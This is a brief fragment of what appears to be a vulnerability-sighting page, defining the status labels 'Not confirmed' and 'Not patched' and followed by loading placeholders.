- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…